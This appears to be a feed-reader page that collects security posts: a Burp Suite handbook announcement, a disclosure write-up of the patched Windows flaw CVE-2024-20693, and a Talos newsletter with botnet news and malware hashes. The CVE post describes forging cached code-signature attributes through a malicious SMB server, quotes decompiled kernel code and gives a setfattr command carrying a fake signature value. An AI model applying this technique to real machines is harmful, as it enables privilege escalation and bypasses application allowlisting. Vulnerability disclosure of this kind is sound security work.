Reading view

There are new articles available, click to refresh the page.

Announcing the Burp Suite Professional chapter in the Testing Handbook

By Maciej Domanski

Based on our security auditing experience, we’ve found that Burp Suite Professional’s dynamic analysis can uncover vulnerabilities hidden amidst the maze of various target components. Unpredictable security issues like race conditions are often elusive when examining source code alone.

While Burp is a comprehensive tool for web application security testing, its extensive features may present a complex barrier. That’s where we, Trail of Bits, stand ready with our new Burp Suite guide in the Testing Handbook. This chapter aims to cut through this complexity, providing a clear and concise roadmap for running Burp Suite and achieving quick and tangible results.

The new chapter starts with an essential discussion on where Burp can support you. This section provides in-depth insights into how Burp can enhance your ability to conduct security testing, especially in the face of challenges like obfuscated front-end code, intricate infrastructural components, variations in deployment environments, or client-side data handling issues.

The chapter provides a step-by-step guide to setting up Burp for your specific application quickly and effectively. It guides you through minimizing setup errors and ensuring potential vulnerabilities are not overlooked—a game-changer in terms of your security auditing outcomes. We also explore using key Burp extensions to supercharge your application testing processes and discover more vulnerabilities.

Our Burp chapter concludes with numerous professional tips and tricks to empower you to perform advanced practices and to reveal hidden Burp characteristics that could revolutionize your security testing routine.

Real-world knowledge, real-world results

The Testing Handbook series encapsulates our extensive real-world knowledge and experience. Our insights go beyond mere documentation recitations, offering tried-and-tested strategies from the Trail of Bits team’s security auditing experience.

With this new chapter, we hope to impart the knowledge and confidence you need to dive into Burp Suite and truly harness its potential to secure your web applications.

Ready to supercharge your security testing with Burp Suite? Dive into the chapter now.

CVE-2024-20693: Windows cached code signature manipulation

In the Patch Tuesday update of April 2024, Microsoft released a fix for CVE-2024-20693, a vulnerability we reported. This vulnerability allowed manipulating the cached signature signing level of an executable or DLL. In this post, we’ll describe how we found this issue and what the impact could be on Windows 11.

Background

Last year, we started a project to improve our knowledge of Windows internals, specifically about local vulnerabilities such as privilege escalation. The best way to get started on a new target is to look at recent publications from other researchers. This gives the most up to date overview of the security design, allows looking for variants of the vulnerability or even bypasses for the implemented fixes.

The most helpful prior work we found was the presentation “The Print Spooler Bug that Wasn’t in the Print Spooler” at OffensiveCon 2023 by Maddie Stone and James Forshaw from Google. This talk describes a Windows privilege escalation exploit discovered in the wild.

Privilege escalation using an impersonated device map and isolation-aware DLLs

In case you haven’t watched this presentation, we’ll summarize it here: a highly privileged Windows service that handles requests on behalf of lower-privileged processes can impersonate the requesting process, in order to make all operations performed by the highly privileged service be performed with the permissions and privileges of the lower-privileged process. This is a great security measure, as it means the highly privileged service can never accidentally do something the lower-privileged process would not be able to do itself.

One thing to note is that a (lowly privileged) process on Windows can change its device map, which can be used to redirect a device letter such as C: to a different location (for example a specific subfolder, like C:\fakeroot). This changed device map is one of the aspects included in impersonation. This is quite risky: what if the impersonating service attempts to load a DLL while impersonating another process which has set a different device map? That issue was already reported in 2015 by James Forshaw and fixed.

However, the logic for determining which file to load for LoadLibrary can be quite complicated if it involves side-by-side assemblies (WinSxS). On Windows, it’s possible to install multiple different versions of a DLL and manifest files can be used to specify which version to load for a specific application. DLL files can also include an embedded manifest to specify which version of its versioned dependencies to load. These are called “isolation aware” DLLs.

The core of the exploited vulnerability is the fact that when an isolation aware DLL file is loaded, the impersonated device map would be used to find the manifests of its dependencies. By combining this with a path traversal in the manifest file, it was possible to make a privileged service load a DLL from a folder on disk specified by the lower privileged process. Loading this malicious DLL would then lead to privilege escalation (impersonation by design no longer provides any security when malicious code is loaded, because it can revert the impersonation). For this attack to work, the impersonating service must load an isolation aware DLL, which depends on at least one other DLL.

The fix applied by Microsoft to address the issue covered in the Maddie Stone and James Forshaw presentation was to apply a new mitigation to disable the loading of WinSxS manifests using the impersonated device map, but only for processes that have specifically opted-in. This flag was only set for a few services that were known to be vulnerable. This means that a lot of privileged services were left that could be examined for the same issue. Very helpfully, Maddie and James explained how to configure Process Monitor on Windows how to find these issues:

Screenshot from the presentation showing how to set up a Process Monitor filter.

So, we set to work finding issues like this. We made a list of isolation aware DLLs with at least one dependency on another library, set up the Process Monitor filters as described and wrote a simple PowerShell script (using the NtObjectManager PowerShell module also from James Forshaw) to enumerate all RPC services and attempt to call all methods. Then, we cross-referenced the libraries loaded under impersonation with the list of DLLs using a manifest.

We found a single match: wscsvc.dll!

wscsvc.dll

When calling the RPC endpoint with number 12 on this service (which takes no arguments), it indirectly loads gpedit.dll. This is an isolation aware DLL, which depends on (among others) comctl32.dll. We replicated the setup from the in-the-wild exploit, creating a new directory at C:\fakeroot, added the required manifest and DLL files, redirecting C: to C:\fakeroot and then sending this COM message.

And it works… almost. Process Monitor shows that it opens and reads our fake DLL file, but never gets to “Load Image”, which is the step where the actual code execution starts. Somehow, it was resolving our DLL but refusing to execute its code.

Then we found out that the process associated with the wscsvc.dll service, namely the “Windows Security Center Service”, is categorized as a PPL (Protected Process Light). This means that it places restrictions on the code signature of DLL files it loads.

Protected Process (Light)

Windows recognizes a number of different protection levels to protect processes from being “modified” (such as terminating it, modifying memory, adding new threads) by a process at a lower protection level. This is used, for example, to make it harder to disable AV tools or important Windows services.

As of Windows 11, the protection levels are:

Level Value
App 8
WinSystem 7
WinTcb 6
Windows 5
Lsa 4
Antimalware 3
CodeGen 2
Authenticode 1
None 0

Whether an operation is allowed is determined by a table known as RtlProtectedAccess. We have summarized it as follows:

→Target ↓Requesting Authenti- code CodeGen Anti- malware Lsa Windows WinTcb WinSystem App
Authenticode
CodeGen
Antimalware
Lsa
Windows
WinTcb
WinSystem

It can roughly be summarized as follows: Windows, WinTcb and WinSystem form a hierarchy (Windows < WinTcb < WinSystem). Authenticode, CodeGen, Antimalware and Lsa are separate groups that only allow access from processes in the same group or the Win-* hierarchy. We are not sure how “App” is used, it is new in Windows 10 and has not been documented very well.

In addition, there is the difference between a Protected Process (PP) and a Protected Process Light (PPL): a Protected Process can modify a Protected Process Light (based on the table above), but not the other way around. The some examples are Antimalware PPLs for third-party security tools and WinTCB or Windows at PP for critical Windows services (like managing DRM). Keep in mind that these protection levels are also in addition to all other authorization checks (such as integrity levels) in Windows. For more information about protected processes, see https://itm4n.github.io/lsass-runasppl/.

Note that this is not considered a defended security boundary by Microsoft: a process running as Administrator can load an exploitable kernel driver, which can be used to modify all protected processes. As admin to kernel is not a security boundary according to Microsoft, protected processes can also not be a security boundary for Administrators.

Aside from the restrictions on being manipulated by other processes, protected processes are also limited in what DLLs they may load. For example, anti-malware services may only load DLLs signed with the same codesigning certificate or by Microsoft itself. From Protecting anti-malware services:

DLL signing requirements

[A]ny non-Windows DLLs that get loaded into the protected service must be signed with the same certificate that was used to sign the anti-malware service.

For protected processes in general, they are only allowed to load a DLL signed with a specific Signature Level. Signature levels are assigned to a DLL based on the certificate and its issuer used for the code signature. The exact rules for when which PPL level may load a DLL with a specific signature level are quite complicated (and these rules can even be customized with a secure boot policy) and we’ll not go into those here. But to summarize: only certain Windows-signed DLLs were allowed to be loaded into our target service.

At this point we had two options: find a different service with the same WinSxS under impersonation vulnerability, or try to bypass the signing of Windows DLL files. The most likely to yield results would of course have been to look for a different service, but the goal of the project was to understand Windows internals better, so we decided to spend a little bit of time on understanding how DLL files are signed.

Sector 7 deciding what to research.

DLL signatures

The codesigning process for PE files is known as Authenticode. Just like TLS, it is based on X.509 certificates. An Authenticode signature is generated by computing the hash of the PE file (leaving out certain fields that will change after signing, such as the checksum and the section for the signature itself), then signing that hash and appending it to the file with the certificate chain (and optionally a timestamp).

Because signature verification can be slow and loading DLLs happens often on Windows, a caching method has been implemented for code signatures. For a signed DLL or EXE file, the result of the certificate verification can be stored in an NTFS Extended Attribute (EA) named $KERNEL.PURGE.ESBCACHE. The $KERNEL part of this name means that only the Windows kernel is allowed to set or change this EA. The PURGE part means that the EA will be automatically removed if the contents of the file are modified. This means that it should not be possible to set this EA from usermode or to modify the file without removing the EA. This only works on journaled NTFS partitions, as the PURGE functionality depends on the journal. Note that nothing in this EA binds it to the file: these attributes contain the journal ID, but nothing like a file path or inode number.

In 2017, James Forshaw had reported that it was possible to race the application of this EA: by making the file refer to a catalog, it was possible to slow down the verification enough to modify the contents of the file in between the verification of the signature and the application of the EA. As this was already found a while ago, it was unlikely that doing this was going to work.

We experimented with placing the file on an SMB share instead and attempting to rewrite the contents in between the verification and image loading, but this wasn’t working either (the file was only being read once). But looking at our Wireshark capture and the decompiled code in CI.DLL that parses the $KERNEL.PURGE.ESBCACHE extended attribute we noticed something standing out:

Screenshot from Wireshark showing an ioctl request with ID 0x90390.

A $KERNEL.PURGE.ESBCACHE extended attribute should only be trusted on the local volume, as a filesystem on (for example) a USB drive or mounted disk image could have been manipulated by the user. There was a check in the code we assumed was meant to check for this and only allow the local boot disk using the function CipGetVolumeFlags.

__int64 __fastcall CipGetVolumeFlags(__int64 file, int *attributeInformation, _BYTE *containerState)
{
  int *v6; // x20
  BOOL shouldFree; // w21
  int ioctlResponse; // w9
  unsigned int err; // w19
  unsigned int v10; // w19
  __int64 buffer; // x0
  int outputBuffer; // [xsp+0h] [xbp-40h] BYREF
  int returnedOutputBufferLength; // [xsp+4h] [xbp-3Ch] BYREF
  int fsInformation[14]; // [xsp+8h] [xbp-38h] BYREF

  outputBuffer = 0;
  returnedOutputBufferLength = 0;
  memset(fsInformation, 0, 48);
  v6 = fsInformation;
  shouldFree = 0;
  // containerState will be set based on the response to the ioctl with ID 0x90390LL on the file
  if ( (int)FsRtlKernelFsControlFile(file, 0x90390LL, 0LL, 0LL, &outputBuffer, 4LL, &returnedOutputBufferLength) >= 0 )
    ioctlResponse = outputBuffer;
  else
    ioctlResponse = 0;
  outputBuffer = ioctlResponse;
  *containerState = ioctlResponse & 1;
  // attributeInformation will be set based on the IoQueryVolumeInformation for FileFsAttributeInformation (5)
  err = IoQueryVolumeInformation(file, 5LL, 48LL, fsInformation, &returnedOutputBufferLength);
  if ( err == 0x80000005 )
  {
    // Retry in case the buffer is too small
    v10 = fsInformation[2] + 8;
    buffer = ExAllocatePool2(258LL, (unsigned int)(fsInformation[2] + 8), 'csIC');
    v6 = (int *)buffer;
    if ( !buffer )
      return 0xC000009A;
    shouldFree = 1;
    err = IoQueryVolumeInformation(file, 5LL, v10, buffer, &returnedOutputBufferLength);
  }
  if ( (err & 0x80000000) == 0 )
    *attributeInformation = *v6;
  if ( shouldFree )
    ExFreePoolWithTag(v6, 'csIC');
  return err;
}

This was being called from CipGetFileCache:

__int64 __fastcall CipGetFileCache(
        __int64 fileObject,
        unsigned __int8 a2,
        int a3,
        unsigned int *a4,
        _DWORD *a5,
        unsigned __int8 *a6,
        int *a7,
        __int64 a8,
        _DWORD *a9,
        _DWORD *a10,
        __int64 a11,
        __int64 a12,
        _QWORD *a13,
        __int64 *a14)
{
  __int64 eaBuffer_1; // x20
  unsigned __int64 v17; // x22
  unsigned int fileAttributes; // w25
  unsigned int attributeInformation_FileSystemAttributes; // w19
  unsigned int err; // w19
  unsigned int err_1; // w0
  __int64 v22; // x4
  __int64 v23; // x3
  __int64 v24; // x2
  __int64 v25; // x1
  int containerState_1; // w10
  unsigned int v28; // w8
  __int64 eaBuffer; // x0
  _DWORD *v30; // x23
  unsigned __int8 *v31; // x24
  int v32; // w8
  char v33; // w22
  const char *v34; // x10
  __int16 v35; // w9
  char v36; // w8
  unsigned int v37; // w25
  int v38; // w9
  int IsEnabled; // w0
  unsigned int v40; // w8
  unsigned int ContextForReplay; // w0
  __int64 v42; // x2
  _QWORD *v43; // x11
  int v44; // w10
  __int64 v45; // x9
  unsigned __int8 containerState; // [xsp+10h] [xbp-C0h] BYREF
  char v47[7]; // [xsp+11h] [xbp-BFh] BYREF
  _DWORD *v48; // [xsp+18h] [xbp-B8h]
  unsigned __int8 *v49; // [xsp+20h] [xbp-B0h]
  unsigned __int8 v50; // [xsp+28h] [xbp-A8h]
  unsigned __int64 v51; // [xsp+30h] [xbp-A0h] BYREF
  unsigned int v52; // [xsp+38h] [xbp-98h]
  int attributeInformation; // [xsp+3Ch] [xbp-94h] BYREF
  int v54; // [xsp+40h] [xbp-90h] BYREF
  int lengthReturned_1; // [xsp+44h] [xbp-8Ch] BYREF
  int lengthReturned; // [xsp+48h] [xbp-88h] BYREF
  int v57; // [xsp+4Ch] [xbp-84h]
  __int64 v58; // [xsp+50h] [xbp-80h]
  __int64 v59; // [xsp+58h] [xbp-78h]
  __int64 v60; // [xsp+60h] [xbp-70h]
  _QWORD *v61; // [xsp+68h] [xbp-68h]
  int *v62; // [xsp+70h] [xbp-60h]
  int eaList[8]; // [xsp+78h] [xbp-58h] BYREF
  char fileBasicInformation[40]; // [xsp+98h] [xbp-38h] BYREF

  [...]

  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 )
  {
    containerState_1 = 0;
  }
  else
  {
    lengthReturned_1 = 0;
    memset(fileBasicInformation, 0, sizeof(fileBasicInformation));
    err = IoQueryFileInformation(fileObject, 4LL, 40LL, fileBasicInformation, &lengthReturned_1);
    if ( (err & 0x80000000) != 0 )
    {
      [...]
      goto LABEL_8;
    }
    fileAttributes = *(_DWORD *)&fileBasicInformation[32];
    // Calling the function above
    err_1 = CipGetVolumeFlags(fileObject, &attributeInformation, &containerState);
    v17 = v51;
    err = err_1;
    if ( (err_1 & 0x80000000) != 0 )
    {
      *a4 = 27;
LABEL_7:
      v22 = *a4;
      goto LABEL_8;
    }
    attributeInformation_FileSystemAttributes = attributeInformation;
    containerState_1 = containerState;
  }
  // If the out variable containerState was non-zero, all of the checks don't matter and we go to LABEL_19 to read the EA.
  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 || containerState_1 )
    goto LABEL_19;
  if ( (g_CiOptions & 0x100) == 0 )
  {
    if ( (attributeInformation_FileSystemAttributes & 0x20000) == 0 || (fileAttributes & 0x4000) == 0 )
    {
      *a4 = 5;
      v17 = fileAttributes | ((unsigned __int64)attributeInformation_FileSystemAttributes << 32);
      err = 0xC00000BB;
      goto LABEL_7;
    }
    goto LABEL_23;
  }
  if ( (attributeInformation_FileSystemAttributes & 0x20000) != 0 && (fileAttributes & 0x4000) != 0 )
  {
	
	[...]

  }
LABEL_19:
  eaBuffer = ExAllocateFromPagedLookasideList(&g_CiEaCacheLookasideList);
  eaBuffer_1 = eaBuffer;
  if ( !eaBuffer )
  {
    v28 = 28;
    err = 0xC0000017;
    goto LABEL_12;
  }
  v33 = v50;
  eaList[0] = 0;
  LOBYTE(eaList[1]) = 22;
  if ( v50 )
  {
    v34 = "$Kernel.Purge.CIpCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.CIpCache";
  }
  else
  {
    v34 = "$Kernel.Purge.ESBCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.ESBCache";
  }
  v35 = *((_WORD *)v34 + 10);
  *(int *)((char *)&eaList[5] + 1) = *((_DWORD *)v34 + 4);
  v36 = v34[22];
  *(_WORD *)((char *)&eaList[6] + 1) = v35;
  HIBYTE(eaList[6]) = v36;
  err = FsRtlQueryKernelEaFile(fileObject, eaBuffer, 380LL, 0LL, eaList, 32LL, 0LL, 1LL, &lengthReturned);
  if ( (err & 0x80000000) != 0 )
  {
    *a4 = 2;
LABEL_34:
    v30 = v48;
    v31 = v49;
LABEL_35:
    ExFreeToPagedLookasideList(&g_CiEaCacheLookasideList, eaBuffer_1);
    v17 = v51;
    goto LABEL_36;
  }
  err = CipParseFileCache(eaBuffer_1, v33, (int *)a4, &v51, eaBuffer_1 + 488);
  if ( (err & 0x80000000) != 0 )
    goto LABEL_34;
  v37 = v57;
  err = CipVerifyFileCache((__int64 *)(eaBuffer_1 + 488), eaBuffer_1, fileObject, v57, v58, &v54, (int *)a4, &v51);
  
  [...]

  return err;
}

What we assumed to be an ioctl that would be handled by the SMB driver (using code 0x90390, which isn’t documented officially, but may refer to FSCTL_QUERY_VOLUME_CONTAINER_STATE, based on Microsoft’s Rust headers) turned out to be an ioctl that gets forwarded over SMB to the server. (While we called it NTFS Extended Attributes, these extended attributes in fact work over SMB too.)

If that icotl results in a value with the lowest bit set, containerState/containerState_1 in CipGetFileCache become non-zero and the code jumps to LABEL_19 above (skipping a lot checks on the file type, device type and a g_CiOptions global we don’t fully understand either).

In other words: the $KERNEL.PURGE.ESBCACHE extended attribute on a file on a SMB share is trusted if the SMB server itself responds to this ioctl that it should be trusted! This is of course a problem, as by default non-admin users can mount new network shares.

We started out with samba and patched it to always respond 0x00000001 to this ioctl (it is not implemented currently) and implemented two more ioctls: 0x900f4 (FSCTL_QUERY_USN_JOURNAL) for reading the journaling information and 0x900ef (FSCTL_WRITE_USN_CLOSE_RECORD) for flushing the journal. We configured Samba to use the ext3 extended attributes to store the EAs used for SMB.

And it worked! From our Linux server running samba, we could apply any $KERNEL.PURGE.ESBCACHE attribute on a file and Windows would trust it. On Linux, the extended attributes used by Samba can be set using setfattr. 1

setfattr -n 'user.$KERNEL.PURGE.ESBCACHE' -v '0skwAAAAMAAg4AAAAAAAAAAIC1e18kqdkBQgAAAHUAJwEMgAAAIGliE1R8dXRmTogdh511MDKXHu0gQC2E1gewfvL5KmZ+JwAMgAAAIGOIg7QdUUiX461yis071EIc4IyH1TDa1WkxRY/PW8thJwQMgAAAIDSDabKZZ2jBOK8AdcS2gu8F0miSEm+H/RilbYQrLrbj' "$1"

We could now create fake EAs that could specify any code signing level we wanted. How can we abuse this?

Combining the DLL load and signature bypass

Now we got to the next challenge: how do we combine these two vulnerabilities? We could make wscsvc.dll load our own DLL using path traversal, but we can’t path traversal from C: into an SMB share. A symbolic link could work, but by default non-admin users on Windows are not allowed to create these. Directory junctions and other symlink-like constructs that Windows supports can not point to SMB shares.

We could perform the attack if the user plugged in a NTFS formatted USB device with a symlink to the SMB share. The user could then create a directory junction from the new C: mountpoint in their devicemap to the USB disk.

C:\fakeroot --(directory junction)--> E:\ --(symlink)--> \\sambaserver\mount

But this required physical access to the machine. We preferred something that would also work remotely.

So we needed a third vulnerability: creating a symlink as a non-admin user.

We tried various things, like mounting disk images or unpacking zip files with symlinks, but before we had found a way to do this, Microsoft had rolled out a more extensive fix for the WinSxS manifest loading under impersonated device maps in August 2023 (as CVE-2023-35359): instead of being opt-in for processes, the device map was now always ignored for reading the manifest.

This meant that our DLL loading vulnerability in wscsvc.dll was no longer working, but we still had the signature bypass. So, next question: what can we do with just cached signature level manipulation on Windows?

Applying the signature bypass

Privilege escalation to SYSTEM using .theme files

In the previous post “Getting SYSTEM on Windows in style” we showed how we managed to elevate privileges on Windows by racing a signing check for a DLL included from a Windows .theme file. In that post, we used a race condition, but we originally found it by setting a manipulated $KERNEL.PURGE.ESBCACHE attribute on the *.msstyles_vrf.dll file. This worked in essentially the same way: we set a new theme which refers to a specifically crafted .msstyles file. Next to the .msstyles file, we place a .msstyles_vrf.dll file. When the user logs in (or sets DPI scaling to >100%), WinLogon.exe (which runs as SYSTEM) will check the signature level of this DLL file, and if it is at least signed at level 6 (“Store”), it will load it, elevating our privileges.

As Microsoft completely removed the loading of *.msstyles_vrf.dll files from themes for CVE-2023-38146, this issue was also fixed.

Bypassing WDAC

One place where cached signatures were used for executables is for Windows Defender Application Control (WDAC), which is an allowlisting technology for executables on Windows. This functionality can be used (typically in a corporate environment) to limit which applications a user is allowed to run and which DLLs may be loaded. Binaries can be allowlisted based on file path, file hash but also the identity of the code signer. WDAC policies can be very powerful and granular, so each company using it probably has their own policy, but the default templates allow all software signed by Microsoft itself to run.

Assuming the WDAC policy allows all software signed by Microsoft, we can add an EA indicating Microsoft as the signer to any executable and run it.

Injecting code into protected processes

The signature bypass can also be used by administrators to inject code into a protected process (regardless of the level). For example, by replacing a DLL from system32 with a symlink to a SMB share and then launching a service that runs as a protected process.

Keep in mind that this is not considered a security boundary by Microsoft, which also means that known techniques that abuse this do not get fixed. So for our demonstration we combined it with the approach used by ANGRYORCHARD to mark our thread as a kernel mode thread and then map the device’s physical memory into our process.

Combining all steps

  1. We use the modified EA on a .msstyles_vrf.dll file to bypass the signature verification in Winlogon.exe to elevate privileges to SYSTEM.
  2. We replace a DLL file from system32 with a symlink to a file with a manipulated cached signature on the SMB share. Then, we launch a protected process running at level WindowsTCB (we chose services.exe).
  3. We use our code running in services.exe to inject code into CSRSS.exe and apply the technique from ANGRYORCHARD to gain physical memory r/w.

Combined with the Mark-of-the-Web bypass found by gabe_k for .themepack files, this attack could have been triggered with just the user opening a downloaded file. Depending on the WDAC policy, we could also have bypassed that.

Fix

So, how did Microsoft fix this?

We had hoped they would disable the reading of $KERNEL.* extended attributes from SMB completely. However, that was not the approach that was taken. Instead, the instances we exploited were fixed:

  1. The fix for CVE-2023-38146 already disabled the loading for *.msstyles_vrf.dll files completely, fixing the privilege escalation.
  2. When WDAC is enabled, the function to retrieve the cached signature level of a file now always returns an error (even for local files!).
  3. When loading a DLL into a protected process, the cached signature level is no longer used. (This was fixed despite Microsoft not considering it a defended security boundary.)

Timeline

  • August 25, 2023: Issue reported to MSRC.
  • September 12, 2023: The fix for CVE-2023-38146 was released, breaking our privilege escalation exploit.
  • September 20, 2023: MSRC indicates that they have reproduced the issue and that a fix is scheduled for January 2024.
  • December 11, 2023: MSRC informs us that a regression was found and asks to reschedule the fix to April 2024.
  • April 9, 2024: Fix released for the WDAC and PPL bypass as CVE-2024-20693.
  • April 25, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us.
  • April 26, 2024: Microsoft Bounty Team sends back a boilerplate reply that the case is under review.
  • May 17, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us again.
  • May 22, 2024: Microsoft Bounty Team replies that the vulnerability was out of scope for a bounty, claiming it didn’t reproduce on the right WIP build.

Mitigation

This attack depends on the victim connecting to a malicious SMB server. Therefore, blocking outgoing SMB to the internet would make this attack a lot harder (unless the attacker already has a foothold on the local network). Preventing users from mounting new SMB shares could also be done as a mitigation, but could have more unintended results.

Examining SMB traffic for exploitation of this issue should also be possible by looking for responses to the ioctl 0x90390 or responses for the EA $KERNEL.PURGE.ESBCACHE.

Conclusion

We set out to increase our understanding of Windows internals by adapting research into DLL loading into impersonating services using WinSxS, but we got sidetracked into examining the code signing method used for DLL files and we found a way to bypass it. While we were unable to apply it in the scenario we started out with, we did find other places where we could use it to elevate privileges, bypass WDAC and inject code into protected processes. Just like our previous research “Bad things come in large packages: .pkg signature verification bypass on macOS” about a signature bypass for macOS .pkg files, we see here that vulnerabilities in cryptographic operations can often be applied in a multitude of ways, allowing different security measures to be bypassed. Just like that example, this vulnerability could go from a user opening a downloaded file to full system compromise.


  1. There appears to be a disagreement between Samba and Windows about what a SMB2_FILE_FULL_EA_INFO GetInfo request means. Windows issues it to query the value for a specific EA, while Samba responds with all EAs on a file, which confuses Windows. Instead of trying to patch Samba to fix this, we have resolved it by making sure the $KERNEL.PURGE.ESBCACHE EA is the only EA set on the file. ↩︎

How we can separate botnets from the malware operations that rely on them

How we can separate botnets from the malware operations that rely on them

As I covered in last week’s newsletter, law enforcement agencies from around the globe have been touting recent botnet disruptions affecting the likes of some of the largest threat actors and malware families.  

Operation Endgame, which Europol touted as the “largest ever operation against botnets,” targeted malware droppers including the IcedID banking trojan, Trickbot ransomware, the Smokeloader malware loader, and more.  

A separate disruption campaign targeted a botnet called “911 S5,” which the FBI said was used to “commit cyber attacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.” 

But with these types of announcements, I think there can be confusion about what a botnet disruption means, exactly. As we’ve written about before in the case of the LockBit ransomware, botnet and server disruptions can certainly cause headaches for threat actors, but usually are not a complete shutdown of their operations, forcing them to go offline forever.  

I’m not saying that Operation Endgame and the 911 S5 disruption aren’t huge wins for defenders, but I do think it’s important to separate botnets from the malware and threat actors themselves.  

For the uninitiated, a botnet is a network of computers or other internet-connected devices that are infected by malware and controlled by a single threat actor or group. Larger botnets are often used to send spam emails in large volumes or carry out distributed denial-of-service attacks by using a mountain of IP addresses to send traffic to a specific target all in a short period. Smaller botnets might be used in targeted network intrusions, or financially motivated botnet controllers might be looking to steal money from targets. 

When law enforcement agencies remove devices from these botnets, it does disrupt actors’ abilities to carry out these actions, but it’s not necessarily the end of the final payload these actors usually use, such as ransomware.  

When discussing this topic in relation to the Volt Typhoon APT, Kendall McKay from our threat intelligence team told me in the latest episode of Talos Takes that botnets should be viewed as separate entity from a malware family or APT. In the case of Volt Typhoon, the FBI said earlier this year it had disrupted the Chinese APT’s botnet, though McKay said “we’re not sure yet” if this has had any tangible effects on their operations. 

With past major botnet disruptions like Emotet and other Trickbot efforts, she also said that “eventually, those threats re-emerge, and the infected devices re-propagate [because] they have worm-like capabilities.” 

So, the next time you see headlines about a botnet disruption, know that yes, this is good news, but it’s also not time to start thinking the affected malware is gone forever.  

The one big thing 

This week, Cisco Talos disclosed a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.” Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  

Why do I care? 

While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware. There are two ways that this attacker commonly targets users to be on the lookout for: One is spearphishing emails that look like they’re referencing legitimate government-related documents and issues, and the other is social media-based phishing. Always be vigilant about anyone reaching out to you via direct messages on platforms like Twitter and LinkedIn.  

So now what? 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense in depth models to protect against such attacks across various attack surfaces. 

Top security headlines of the week 

Microsoft announced changes to its Recall AI service after privacy advocates and security engineers warned about the potential privacy dangers of such a feature. The Recall tool in Windows 11 takes continuous screenshots of users’ activity which can then be queried by the user to do things like locate files or remember the last thing they were working on. However, all that data collected by Recall is stored locally on the device, potentially opening the door to data theft if a machine were to be compromised. Now, Recall will be opt-in only, meaning it’ll be turned off by default for users when it launches in an update to Windows 11. The feature will also be tied to the Windows Hello authentication protocol, meaning anyone who wants to look at their timeline needs to log in with face or fingerprint ID, or a unique PIN. After Recall’s announcement, security researcher Kevin Beaumont discovered that the AI-powered feature stored data in a database in plain text. That could have made it easy for threat actors to create tools to extract the database and its contents. Now, Microsoft has also made it so that these screenshots and the search index database are encrypted, and are only decrypted if the user authenticates. (The Verge, CNET

A data breach affecting cloud storage provider Snowflake has the potential to be one of the largest security events ever if the alleged number of affected users is accurate. Security researchers helping to address the attack targeting Snowflake said this week that financially motivated cybercriminals have stolen “a significant volume of data” from hundreds of customers. As many as 165 companies that use Snowflake could be affected, which is notable because Snowflake is generally used to store massive volumes of data on its servers. Breaches affecting Ticketmaster, Santander bank and Lending Tree have already been linked to the Snowflake incident. Incident responders working on the breach wrote this week that the attackers used stolen credentials to access customers’ Snowflake instances and steal valuable data. The activity dates back to at least April 14. Reporters at online news outlet TechCrunch also found that hundreds of Snowflake customer credentials were available on the dark web, after malware infected Snowflake staffers’ computers. The list poses an ongoing risk to any Snowflake users who had not changed their passwords as of the first disclosure of this breach or are not protected by multi-factor authentication. (TechCrunch, Wired

Recovery of a cyber attack affecting several large hospitals in London could take several months to resolve, according to an official with the U.K.’s National Health Service. The affected hospitals and general practitioners’ offices serve a combined 2 million patients. A recent cyber attack targeting a private firm called Synnovis that analyzes blood tests has forced these offices to reschedule appointments and cancel crucial surgeries. “It is unclear how long it will take for the services to get back to normal, but it is likely to take many months,” the NHS official told The Guardian newspaper. Britain also had to put out a call for volunteers to donate type O blood as soon as possible, as the attack has made it more difficult for health care facilities to match patients’ blood types at the same frequency as usual. Type O blood is generally known to be safe for all patients and is commonly used in major surgeries. (BBC, The Guardian

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 2d1a07754e76c65d324ab8e538fa74e5d5eb587acb260f9e56afbcf4f4848be5 
MD5: d3ee270a07df8e87246305187d471f68 
Typical Filename: iptray.exe 
Claimed Product: Cisco AMP 
Detection Name: Generic.XMRIGMiner.A.A13F9FCC

SHA 256: 9b2ebc5d554b33cb661f979db5b9f99d4a2f967639d73653f667370800ee105e 
MD5: ecbfdbb42cb98a597ef81abea193ac8f 
Typical Filename: N/A 
Claimed Product: MAPIToolkitConsole.exe 
Detection Name: Gen:Variant.Barys.460270 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

Operation Celestial Force employs mobile and desktop malware to target Indian entities

